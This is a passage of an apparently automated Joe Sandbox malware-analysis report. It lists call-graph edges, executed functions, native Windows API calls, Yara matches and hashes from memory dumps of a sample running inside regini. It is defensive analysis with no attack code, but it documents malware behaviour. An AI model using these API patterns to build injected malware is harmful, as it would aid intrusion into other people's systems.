100729 4bfa67 100759 4c8f10 100729->100759 100731 4bfae2 100732 4c9480 NtClose 100731->100732 100733 4bfaec 100732->100733 100734 4cb580 RtlFreeHeap 100733->100734 100735 4bfaf3 100734->100735 100736 4bfa85 100736->100731 100737 4c8f10 LdrInitializeThunk 100736->100737 100737->100736 100739 4b6325 100738->100739 100763 4c8d90 100739->100763 100742 4c6e10 100743 4c6e74 100742->100743 100744 4c6ea7 100743->100744 100768 4c03c6 RtlFreeHeap 100743->100768 100744->100715 100746 4c6e89 100746->100715 100748 4bf5ac 100747->100748 100749 4b4470 2 API calls 100748->100749 100751 4bf5ca 100749->100751 100750 4bf5d3 100750->100720 100751->100750 100752 4b4470 2 API calls 100751->100752 100753 4bf69e 100752->100753 100754 4b4470 2 API calls 100753->100754 100755 4bf6fb 100753->100755 100754->100755 100755->100720 100758 4bf4e5 100756->100758 100757 4bf57b CoUninitialize 100757->100729 100758->100757 100760 4c8f2d 100759->100760 100769 2db2ba0 LdrInitializeThunk 100760->100769 100761 4c8f5d 100761->100736 100764 4c8dad 100763->100764 100767 2db2c60 LdrInitializeThunk 100764->100767 100765 4b6399 100765->100735 100765->100742 100767->100765 100768->100746 100769->100761 100775 4c16f0 100776 4c170c 100775->100776 100777 4c1748 100776->100777 100778 4c1734 100776->100778 100779 4c9480 NtClose 100777->100779 100780 4c9480 NtClose 100778->100780 100781 4c1751 100779->100781 100782 4c173d 100780->100782 100785 4cb6a0 RtlAllocateHeap 100781->100785 100784 4c175c 100785->100784 100786 4c00b0 100787 4c00cd 100786->100787 100788 4b4470 2 API calls 100787->100788 100789 4c00eb 100788->100789 100790 4c6e10 RtlFreeHeap 100789->100790 100791 4c027b 100789->100791 100790->100791

                                                                                                              Executed Functions

                                                                                                              Function 004A9EE0 Relevance: 14.0, Strings: 11, Instructions: 253COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 285 4a9ee0-4aa05b 286 4aa065-4aa06c 285->286 287 4aa06e-4aa08b 286->287 288 4aa08d 286->288 287->286 289 4aa094-4aa09a 288->289 290 4aa09c-4aa0ae 289->290 291 4aa0b0-4aa0b7 289->291 290->289 292 4aa0bb-4aa0c2 291->292 293 4aa0e3-4aa0e9 292->293 294 4aa0c4-4aa0e1 292->294 295 4aa0ef-4aa0f6 293->295 296 4aa2a7-4aa2ad 293->296 294->292 297 4aa0f8-4aa12b 295->297 298 4aa12d-4aa13d 295->298 299 4aa2af-4aa2c1 296->299 300 4aa2c3-4aa2ca 296->300 297->295 301 4aa148-4aa151 298->301 299->296 302 4aa2cc call 4cb1e0 300->302 303 4aa2d1-4aa2d8 300->303 304 4aa153-4aa15f 301->304 305 4aa161-4aa168 301->305 302->303 307 4aa2da-4aa2e0 303->307 308 4aa2e3-4aa2e9 303->308 304->301 311 4aa173-4aa179 305->311 307->308 309 4aa2eb-4aa2fd 308->309 310 4aa2ff-4aa309 308->310 309->307 314 4aa17b-4aa185 311->314 315 4aa187-4aa193 311->315 314->311 316 4aa1ff-4aa206 315->316 317 4aa195-4aa19f 315->317 321 4aa208-4aa219 316->321 322 4aa22f-4aa236 316->322 319 4aa1d3-4aa1d7 317->319 320 4aa1a1-4aa1c0 317->320 325 4aa1fa 319->325 326 4aa1d9-4aa1f8 319->326 323 4aa1c2-4aa1cb 320->323 324 4aa1d1 320->324 327 4aa21b-4aa21f 321->327 328 4aa220-4aa222 321->328 329 4aa241-4aa247 322->329 323->324 324->317 325->296 326->319 327->328 330 4aa22d 328->330 331 4aa224-4aa22a 328->331 332 4aa25a-4aa26b 329->332 333 4aa249-4aa258 329->333 330->316 331->330 334 4aa276-4aa27c 332->334 333->329 336 4aa27e-4aa28e 334->336 337 4aa290-4aa2a0 334->337 336->334 337->337 338 4aa2a2 337->338 338->293
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: P$*5$3$8P$Ri$_S$d$e$g&$C$[
                                                                                                              • API String ID: 0-3557587716
                                                                                                              • Opcode ID: ba4ca5e3aed733b28ba8d0d2b997c9f66a207a9f8aec4634ebc5432cbef62017
                                                                                                              • Instruction ID: c3481549e43d527aa1d640b1ca261ce91eee58d25257cd53a6e82f2ab6548fce
                                                                                                              • Opcode Fuzzy Hash: ba4ca5e3aed733b28ba8d0d2b997c9f66a207a9f8aec4634ebc5432cbef62017
                                                                                                              • Instruction Fuzzy Hash: D5C1F2B0D05218DFEB24CF84D89479EBBB2FF55308F20819AD009AB381D7B95A95CF56
                                                                                                              Function 004BC530 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 004BC614
                                                                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 004BC64F
                                                                                                              • FindClose.KERNELBASE(?), ref: 004BC65A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                              • String ID:
                                                                                                              • API String ID: 3541575487-0
                                                                                                              • Opcode ID: bb8687520c3024c0b5dcd78b49cceb22e88c118e3d67c23c330271cbefa2063d
                                                                                                              • Instruction ID: 7ebdd79678cb3d83805ea2f5d99ad6b45e74c773f426063f473314b1267de8a9
                                                                                                              • Opcode Fuzzy Hash: bb8687520c3024c0b5dcd78b49cceb22e88c118e3d67c23c330271cbefa2063d
                                                                                                              • Instruction Fuzzy Hash: B931D6B19002087BDB20DF65CCC5FFF777C9B55708F14444EB908A6191E674AE848BA9
                                                                                                              Function 004C9160 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 004C9261
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 823142352-0
                                                                                                              • Opcode ID: 78542d5dd399c300eafcdcd0564ef46d61d86e09d9dcfba255c8406a5134e63c
                                                                                                              • Instruction ID: f96c606e0c00b7443d308b234b344b0a05caa40d39e43b6c29adc7f9c4dab797
                                                                                                              • Opcode Fuzzy Hash: 78542d5dd399c300eafcdcd0564ef46d61d86e09d9dcfba255c8406a5134e63c
                                                                                                              • Instruction Fuzzy Hash: 3B31C3B5A00648AFDB54DF99D881EEEB7B9EF8C304F10820DF919A7340D734A9518BA5
                                                                                                              Function 004C92D0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 004C93B9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 2738559852-0
                                                                                                              • Opcode ID: 687e748b06c28cbfd9ec1d2a88fb48ac65238741f4f2820f497854d6ba739803
                                                                                                              • Instruction ID: aa0653f3121b338c17b8d2c6b32b6f9700ba3564671cb8d92d58b9ab45f49fac
                                                                                                              • Opcode Fuzzy Hash: 687e748b06c28cbfd9ec1d2a88fb48ac65238741f4f2820f497854d6ba739803
                                                                                                              • Instruction Fuzzy Hash: 6331D8B5A00648AFDB14DF99D841EEF77B9EF89314F10810EF918A7240D734A9118FA5
                                                                                                              Function 004C95F0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • NtAllocateVirtualMemory.NTDLL(004B1CAE,?,004C7F1F,00000000,00000004,00003000,?,?,?,?,?,004C7F1F,004B1CAE), ref: 004C96BB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 2167126740-0
                                                                                                              • Opcode ID: 0bffa539fa9e2253058f57ffbfebc8fc8b7b48bf31199cf5e87442f578cfee85
                                                                                                              • Instruction ID: 9b8f72750dbbd09f13419df4ef550c576d8e5c087b4972a5702695e6252836fb
                                                                                                              • Opcode Fuzzy Hash: 0bffa539fa9e2253058f57ffbfebc8fc8b7b48bf31199cf5e87442f578cfee85
                                                                                                              • Instruction Fuzzy Hash: 5F2106B9A00648ABDB10DF99DC41FEFB7B9EF89304F00810EFD18A7240D774A9118BA5
                                                                                                              Function 004C93D0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: DeleteFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 4033686569-0
                                                                                                              • Opcode ID: ca2d9032e5ad2f02e23ce478455a6b7953ee5e8e3ae966cf420ab01d4ee535fe
                                                                                                              • Instruction ID: 5fe4b6a698440ae8b9d74a7e9c44e0541a1ae93ed8cc9e09cb25a68af050c6ca
                                                                                                              • Opcode Fuzzy Hash: ca2d9032e5ad2f02e23ce478455a6b7953ee5e8e3ae966cf420ab01d4ee535fe
                                                                                                              • Instruction Fuzzy Hash: D711A3756006087BD710EA99CC42FEF77ACEF85318F00814EF908A7241D77479168BA9
                                                                                                              Function 004C9480 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 004C94B7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close
                                                                                                              • String ID:
                                                                                                              • API String ID: 3535843008-0
                                                                                                              • Opcode ID: d2ca64d7c9c952193a798ba580e50a54d6823f4a9d2982a8448f0dd46e0cb6d6
                                                                                                              • Instruction ID: b61082f5a54088d3081eddec5236873fd75853d51f1b5981f78213f8b81dd8eb
                                                                                                              • Opcode Fuzzy Hash: d2ca64d7c9c952193a798ba580e50a54d6823f4a9d2982a8448f0dd46e0cb6d6
                                                                                                              • Instruction Fuzzy Hash: C3E086392402047BD520EB5ADC42FDB77ACEFC5754F008519FA0CA7241CA71B91187F4
                                                                                                              Function 02DB4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 5f5aa04744379f142db894f551822a9cb8fd9fbc1bc5ab5495bb05004a1c0956
                                                                                                              • Instruction ID: 96d9077ae7a2d1d6f67480feea7fa9095a18b9b7a5629bfa3fa109c247bfbae8
                                                                                                              • Opcode Fuzzy Hash: 5f5aa04744379f142db894f551822a9cb8fd9fbc1bc5ab5495bb05004a1c0956
                                                                                                              • Instruction Fuzzy Hash: 6E90023160980112964171594884947400597E0301B65C015E042C774C8A158E566361
                                                                                                              Function 02DB4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: d856f1cce2a71aee9c6fba89e9d0a2b6d05f0b7564ca99ff43257241f1d47f6c
                                                                                                              • Instruction ID: 3511ab922a214f5ea0a4015a32b81e73fbe9aa8c11c27d987cb353b7b4536871
                                                                                                              • Opcode Fuzzy Hash: d856f1cce2a71aee9c6fba89e9d0a2b6d05f0b7564ca99ff43257241f1d47f6c
                                                                                                              • Instruction Fuzzy Hash: 3790026160550142464171594804807600597E13013A5C119A055C770C86198D55A269
                                                                                                              Function 02DB2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 9bb3ea07901532daabf2312b487461d8c644393d60732fb3eee3355dd879d371
                                                                                                              • Instruction ID: b6aed1428449a8fc81d95ac93fc062d5ef0525cae670bdcd5a8a793f48ea36e5
                                                                                                              • Opcode Fuzzy Hash: 9bb3ea07901532daabf2312b487461d8c644393d60732fb3eee3355dd879d371
                                                                                                              • Instruction Fuzzy Hash: 0F900225215401030606B5590704907004687D5351365C025F101D770CD6228D616121
                                                                                                              Function 02DB2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 813284777641231c2f88a757cfe44b6611fd6470fc8b25954809f12156d56836
                                                                                                              • Instruction ID: a3984a3fc6e37d6297fc0bbdf524f35a00143b5235801b606990b186e71f0458
                                                                                                              • Opcode Fuzzy Hash: 813284777641231c2f88a757cfe44b6611fd6470fc8b25954809f12156d56836
                                                                                                              • Instruction Fuzzy Hash: E2900225225401020646B559060490B044597D63513A5C019F141E7B0CC6228D656321
                                                                                                              Function 02DB2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 8983541e8c987c2c477b679223089887c6b6d1e9ded96536b589a84b2d60a666
                                                                                                              • Instruction ID: 973e558f882d90e21b1f7d7a7039d40d49f8d991a784c601a0bbb1975e53c22b
                                                                                                              • Opcode Fuzzy Hash: 8983541e8c987c2c477b679223089887c6b6d1e9ded96536b589a84b2d60a666
                                                                                                              • Instruction Fuzzy Hash: 0390023120540902D68171594404A4B000587D1301FA5C019A002D774DCA168F5977A1
                                                                                                              Function 02DB2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 9269b89a3486a1f753a7331a2d509cdbb5d3f639ed31b00cccee6a7b54dafe9a
                                                                                                              • Instruction ID: e97a07f4811fb844978002b55e7b1030480da5b85747132b6d3d7fa8761ca251
                                                                                                              • Opcode Fuzzy Hash: 9269b89a3486a1f753a7331a2d509cdbb5d3f639ed31b00cccee6a7b54dafe9a
                                                                                                              • Instruction Fuzzy Hash: 4890023120944942D64171594404E47001587D0305F65C015A006C7B4D96268E55B661
                                                                                                              Function 02DB2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: b0c8ab76098faa598fb8ec9ad205428c697b34cd4eadb6e566e03aa872b3690d
                                                                                                              • Instruction ID: 6779294883cdfcaab824c5a7a8fae5abeae582caf648bb9092639f51e6cbc76a
                                                                                                              • Opcode Fuzzy Hash: b0c8ab76098faa598fb8ec9ad205428c697b34cd4eadb6e566e03aa872b3690d
                                                                                                              • Instruction Fuzzy Hash: 3490023160940902D65171594414B47000587D0301F65C015A002C774D87568F5576A1
                                                                                                              Function 02DB2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 76c27757fd8b8a0cb76a1094f601fcd11a68fbc59fc1004a22a7996876fa3b66
                                                                                                              • Instruction ID: d0cf7a0c7815b4fc00dbdef551f5958f73ac679735f327c105ba78e4b269fb4d
                                                                                                              • Opcode Fuzzy Hash: 76c27757fd8b8a0cb76a1094f601fcd11a68fbc59fc1004a22a7996876fa3b66
                                                                                                              • Instruction Fuzzy Hash: C890026120640103460671594414A17400A87E0201B65C025E101C7B0DC5268D917125
                                                                                                              Function 02DB2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 2e1166f6553428baa85a30f2195cde13bd6230fdba89d0d069fde0ad46c11473
                                                                                                              • Instruction ID: e57d9a67080c0afea3ac4c9852f54469e77ccc0073fe0d55c90b02e4a3f6f7c7
                                                                                                              • Opcode Fuzzy Hash: 2e1166f6553428baa85a30f2195cde13bd6230fdba89d0d069fde0ad46c11473
                                                                                                              • Instruction Fuzzy Hash: 1E90026120580503D64175594804A07000587D0302F65C015A206C775E8A2A8D517135
                                                                                                              Function 02DB2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 824ade85ebdd7ee6aa9b9ec6cd3e35bc1a6db8b7dd39c97caf12d3089d751bdb
                                                                                                              • Instruction ID: 52cc7c3548773bc91a018235697f6a665cfe63e9ec88237bab1dad6db672214d
                                                                                                              • Opcode Fuzzy Hash: 824ade85ebdd7ee6aa9b9ec6cd3e35bc1a6db8b7dd39c97caf12d3089d751bdb
                                                                                                              • Instruction Fuzzy Hash: 1090022160540602D60271594404A17000A87D0241FA5C026A102C775ECA268E92B131
                                                                                                              Function 02DB2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 650b36942388c1619922473b5caa68cca596bc3362deea03293fd9231b7c2103
                                                                                                              • Instruction ID: f836c76b57dc4d13f407fd40933ae7bbce3d1c5ef7feb2f4b4d7c746028fc84c
                                                                                                              • Opcode Fuzzy Hash: 650b36942388c1619922473b5caa68cca596bc3362deea03293fd9231b7c2103
                                                                                                              • Instruction Fuzzy Hash: 79900221215C0142D70175694C14F07000587D0303F65C119A015C774CC9168D616521
                                                                                                              Function 02DB2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: d742198b3969a4eb0a0f35a7b4c1f4e52124c7dc7850b74093e80b722ac9e79a
                                                                                                              • Instruction ID: b71f70a77836ed3d36df0da601ec4dddcb62f805e71b362b978c5d6d8925dfd4
                                                                                                              • Opcode Fuzzy Hash: d742198b3969a4eb0a0f35a7b4c1f4e52124c7dc7850b74093e80b722ac9e79a
                                                                                                              • Instruction Fuzzy Hash: 6D90022160540142464171698844D074005ABE1211765C125A099C770D855A8D656665
                                                                                                              Function 02DB2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
